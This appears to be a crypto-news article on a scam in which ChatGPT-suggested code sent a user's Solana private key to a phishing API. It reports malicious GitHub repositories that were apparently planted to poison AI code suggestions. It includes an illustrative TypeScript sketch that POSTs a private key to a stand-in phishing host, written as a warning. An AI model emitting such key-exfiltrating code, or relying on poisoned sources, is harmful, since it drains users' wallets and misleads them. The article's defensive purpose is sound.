"AI Poisoning" Is Unstoppable: Can You Still Code with ChatGPT?

24-11-22 15:24
Read this article in 6 Minutes

Recently, a user ran into an online scam while asking ChatGPT for help writing an automatic post-boosting bot for pump.fun. Following the code guidance ChatGPT provided, the user visited a recommended Solana API website that turned out to be a scam platform, losing about $2,500.



According to the user's account, part of the code required submitting a private key via an API. Being preoccupied, the user used their main Solana wallet without reviewing the code. In hindsight they recognized this as a grave mistake, but at the time their trust in OpenAI led them to overlook the risk.



After the API was used, the fraudsters acted swiftly, transferring all assets from the user's wallet to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX within just 30 minutes. At first the user was not certain the website itself was the problem, but a closer look at the domain's homepage revealed conspicuous signs that it was suspicious.



The user is now appealing to the community, asking @solana to block the scam site and @OpenAI to remove the associated information from its platform so that no one else is harmed. They also hope to trace the fraudsters through the clues left behind and bring them to justice.


A Scam Sniffer investigation uncovered malicious code repositories designed to steal private keys through AI-generated code:


• solanaapisdev/moonshot-trading-bot

• solanaapisdev/pumpfun-api


GitHub user 'solanaapisdev' has created multiple code repositories over the past 4 months, apparently attempting to steer AI tools into generating malicious code.



The user's private key was compromised because the code sent it directly to the phishing website in the body of an HTTP request.
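The report does not reproduce the actual malicious code, but the pattern it describes looks roughly like the TypeScript sketch below. The endpoint URL, function name, and field names are hypothetical, invented only to illustrate the red flag of a private key appearing in an outgoing request body.

```typescript
// HYPOTHETICAL sketch of the dangerous pattern described above -- not the real
// code from the incident. The endpoint and field names are invented.
// Any "API" that asks you to submit a private key like this can drain the wallet.

async function dangerousSignAndSend(privateKeyBase58: string): Promise<void> {
  // The private key is placed directly in the HTTP request body and sent to a
  // third-party server -- whoever controls that server now controls the wallet.
  await fetch("https://example-phishing-api.invalid/api/trade", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      private_key: privateKeyBase58, // <-- red flag: a key should never be sent anywhere
      action: "buy",
      amountSol: 0.5,
    }),
  });
}
```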



SlowMist founder Yu Xian (Cos) said: "These are all very unsafe practices, poisoning of all kinds. Not only does it have users upload private keys, it also helps users generate private keys online and then has them use those. The documentation is also written in a perfunctory way."


He added that these malicious code websites offer very little contact information and that the official site has almost no content beyond documentation and a code repository. "The domain was registered at the end of September, which makes it feel like premeditated poisoning, but there is no evidence as to whether GPT was deliberately poisoned or whether GPT picked it up on its own."


Scam Sniffer offers the following security recommendations for AI-generated code (illustrated in the sketch after the list):


• Do not blindly use AI-generated code

• Always carefully review the code

• Store private keys in an offline environment

• Only use trusted sources
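For contrast, here is a minimal sketch of the safer pattern these recommendations point toward, assuming the widely used @solana/web3.js library. The keypair path, RPC endpoint, and function name are placeholders: the key is loaded from a local file and only used to sign locally, so it never appears in any request body.

```typescript
// Minimal sketch of the safer pattern, assuming @solana/web3.js.
// The key stays on your machine; only a locally signed transaction is sent,
// and only to an RPC endpoint you trust. Paths and URLs below are placeholders.
import { readFileSync } from "fs";
import {
  Connection,
  Keypair,
  LAMPORTS_PER_SOL,
  PublicKey,
  SystemProgram,
  Transaction,
  sendAndConfirmTransaction,
} from "@solana/web3.js";

async function safeTransfer(recipient: PublicKey, sol: number): Promise<string> {
  // Load the keypair from a local file (e.g. one generated by `solana-keygen`),
  // never from a web form and never pasted into third-party sites or code.
  const secret = JSON.parse(readFileSync("/path/to/local-keypair.json", "utf8"));
  const payer = Keypair.fromSecretKey(Uint8Array.from(secret));

  const connection = new Connection("https://api.mainnet-beta.solana.com");
  const tx = new Transaction().add(
    SystemProgram.transfer({
      fromPubkey: payer.publicKey,
      toPubkey: recipient,
      lamports: sol * LAMPORTS_PER_SOL,
    })
  );

  // Signing happens locally; the private key never leaves this process.
  return sendAndConfirmTransaction(connection, tx, [payer]);
}
```

The contrast is the point: a legitimate client library only needs your key to sign transactions locally, whereas any service that asks you to submit the key itself is effectively asking for custody of the wallet.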


Source: Original Article Link


Welcome to join the official BlockBeats community:

Telegram subscription group: https://t.me/theblockbeats

Telegram discussion group: https://t.me/BlockBeats_App

Official Twitter account: https://twitter.com/BlockBeatsAsia
